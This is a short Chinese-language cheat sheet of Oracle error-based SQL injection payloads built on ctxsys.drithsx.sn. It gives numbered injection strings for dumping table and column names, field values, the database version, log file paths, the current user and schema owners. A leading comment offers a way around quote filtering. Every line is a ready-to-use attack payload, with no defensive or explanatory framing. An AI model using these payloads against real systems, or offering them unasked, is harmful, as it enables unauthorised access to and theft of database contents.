//若过滤了"" '', 可用not in ('字段')代替
1. 表名爆破
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))
2. 字段爆破
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='xx' and rownum=1)) //xx为爆破出的表名
3. 多个字段爆破
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='xx' and column_name<>'x' and rownum=1)) //x为排除显示该数据
4. 字段值爆破
and 1=ctxsys.drithsx.sn(1,(select A from B where rownum=1)) // A为查询的字段 B为表名
5. 数据库版本信息爆破
and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))
6. 操作系统信息爆破
and 1=ctxsys.drithsx.sn(1,(select member from v$logfile where rownum=1))
7. 当前连接用户信息爆破
and 1=ctxsys.drithsx.sn(1,(select SYS_CONTEXT ('USERENV', 'CURRENT_USER')from dual))
8. 数据库名爆破
and 1=ctxsys.drithsx.sn(1,(SELECT DISTINCT owner FROM all_tables))
9. 当前用户爆破
and 1=ctxsys.drithsx.sn(1,(SELECT user FROM dual ))
10. 查询指定字段值数量
select count(*) from user_tab_columns where column_name like 'xx'